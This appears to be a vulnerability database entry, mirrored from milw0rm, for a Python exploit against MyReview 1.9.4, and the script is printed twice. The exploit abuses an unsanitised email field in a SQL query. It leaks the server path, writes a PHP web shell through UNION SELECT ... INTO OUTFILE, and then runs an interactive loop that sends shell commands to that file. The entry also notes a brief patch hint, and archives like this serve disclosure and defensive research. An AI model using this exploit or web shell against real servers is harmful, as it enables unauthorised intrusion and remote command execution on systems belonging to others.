Search...

MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit

2006-09-19T00:00:00

ID SSV:16531
Type seebug
Reporter Root
Modified 2006-09-19T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............	
#	function GetMember ($email, $db, $mode=&quot;array&quot;)
#	{
#  		$query = &quot;SELECT * FROM PCMember WHERE email = '$email'&quot; ;
#		result = $db-&gt;execRequete ($query);
# .......... 
# 
# $email is not checked before used into $query
# 
# for patch 
# 
# 1. add &quot;$email=addslashes(trim($email));&quot; before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#


import httplib, urllib, re, urlparse, sys

def usage():
	print &quot;&quot;&quot;
MyReview 1.9.4 SQL Injection exploit

Usage: python exploit.py http://target/pathtomyreview/

Requires warnings to be displayed so we cat get the localpath and FILES/ to be writable

by STILPU  (dmooray[a lu']gmail.com)

&quot;&quot;&quot;
	sys.exit(1)

def getlocalpath(server):
	params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
	headers={&quot;Content-type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;Accept&quot;: &quot;text/plain&quot;}
	con = httplib.HTTPConnection(server)
	con.request(&quot;POST&quot;,path+&quot;Admin.php&quot;,params,headers)
	resp=con.getresponse()
	data=resp.read()
	try:
		localpath=re.search('&gt;/.*B',data[0:10000]).group().replace('&gt;','',1).replace('B','',1)	
	except Exception: print &quot;Exploit failed: didn`t manage to get localpath&quot;; sys.exit(1)
	return localpath
	
def sendshell(server):
	shell=&quot;'&lt;?php error_reporting(0); ini_set(\&quot;max_execution_time\&quot;,0); system($_GET[cmd]); /*'&quot;
	sql=&quot;' union select &quot; + shell + &quot;,0,0,0,'*/ ?&gt;' into outfile '&quot; +getlocalpath(server)+ &quot;FILES/STILPU.php' from PCMember#&quot;
	headers={&quot;Content-type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;Accept&quot;: &quot;text/plain&quot;}
	params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
	con = httplib.HTTPConnection(server)
	con.request(&quot;POST&quot;,path+&quot;Admin.php&quot;,params,headers)

def sendcmd(server):
	while 1:
		try:
			cmd=raw_input('sh$ ')
			cmd=cmd.replace(&quot; &quot;,&quot;+&quot;)
			con = httplib.HTTPConnection(target)
			con.request(&quot;GET&quot;,path+&quot;FILES/STILPU.php?cmd=&quot;+cmd)
			resp=con.getresponse()
			data=resp.read()
			if (cmd==&quot;exit&quot; or cmd==&quot;quit&quot;): break
			print data
		except KeyboardInterrupt: break	


if __name__ == '__main__':

	if len(sys.argv) &lt; 2:
		usage()		
	
	else:
		url = sys.argv[1]
		url = urlparse.urlsplit(url)
		target = url[1]
		path = url[2]
		
		sendshell(target)
		sendcmd(target)

# milw0rm.com [2006-09-19]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-16531", "status": "poc", "bulletinFamily": "exploit", "modified": "2006-09-19T00:00:00", "title": "MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-16531", "cvelist": [], "description": "No description provided by source.", "viewCount": 8, "published": "2006-09-19T00:00:00", "sourceData": "\n # MyReview 1.9.4 SQL Injection exploit\n#\n#\n# http://myreview.lri.fr/\n#\n# in functions.php starting from line 382\n# ............\t\n#\tfunction GetMember ($email, $db, $mode="array")\n#\t{\n# \t\t$query = "SELECT * FROM PCMember WHERE email = '$email'" ;\n#\t\tresult = $db->execRequete ($query);\n# .......... \n# \n# $email is not checked before used into $query\n# \n# for patch \n# \n# 1. add "$email=addslashes(trim($email));" before $query\n# 2. use something else, very buggy script\n#\n# by STILPU (dmooray[a lu']gmail.com)\n#\n\n\nimport httplib, urllib, re, urlparse, sys\n\ndef usage():\n\tprint """\nMyReview 1.9.4 SQL Injection exploit\n\nUsage: python exploit.py http://target/pathtomyreview/\n\nRequires warnings to be displayed so we cat get the localpath and FILES/ to be writable\n\nby STILPU (dmooray[a lu']gmail.com)\n\n"""\n\tsys.exit(1)\n\ndef getlocalpath(server):\n\tparams=urllib.urlencode({'email':'\\'','motDePasse':'a','ident':'Log in'})\n\theaders={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}\n\tcon = httplib.HTTPConnection(server)\n\tcon.request("POST",path+"Admin.php",params,headers)\n\tresp=con.getresponse()\n\tdata=resp.read()\n\ttry:\n\t\tlocalpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)\t\n\texcept Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)\n\treturn localpath\n\t\ndef sendshell(server):\n\tshell="'<?php error_reporting(0); ini_set(\\"max_execution_time\\",0); system($_GET[cmd]); /*'"\n\tsql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"\n\theaders={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}\n\tparams=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})\n\tcon = httplib.HTTPConnection(server)\n\tcon.request("POST",path+"Admin.php",params,headers)\n\ndef sendcmd(server):\n\twhile 1:\n\t\ttry:\n\t\t\tcmd=raw_input('sh$ ')\n\t\t\tcmd=cmd.replace(" ","+")\n\t\t\tcon = httplib.HTTPConnection(target)\n\t\t\tcon.request("GET",path+"FILES/STILPU.php?cmd="+cmd)\n\t\t\tresp=con.getresponse()\n\t\t\tdata=resp.read()\n\t\t\tif (cmd=="exit" or cmd=="quit"): break\n\t\t\tprint data\n\t\texcept KeyboardInterrupt: break\t\n\n\nif __name__ == '__main__':\n\n\tif len(sys.argv) < 2:\n\t\tusage()\t\t\n\t\n\telse:\n\t\turl = sys.argv[1]\n\t\turl = urlparse.urlsplit(url)\n\t\ttarget = url[1]\n\t\tpath = url[2]\n\t\t\n\t\tsendshell(target)\n\t\tsendcmd(target)\n\n# milw0rm.com [2006-09-19]\n\n ", "id": "SSV:16531", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:27:16", "reporter": "Root", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2017-11-19T22:27:16", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:27:16", "rev": 2}, "vulnersScore": 0.7}, "references": [], "immutableFields": []}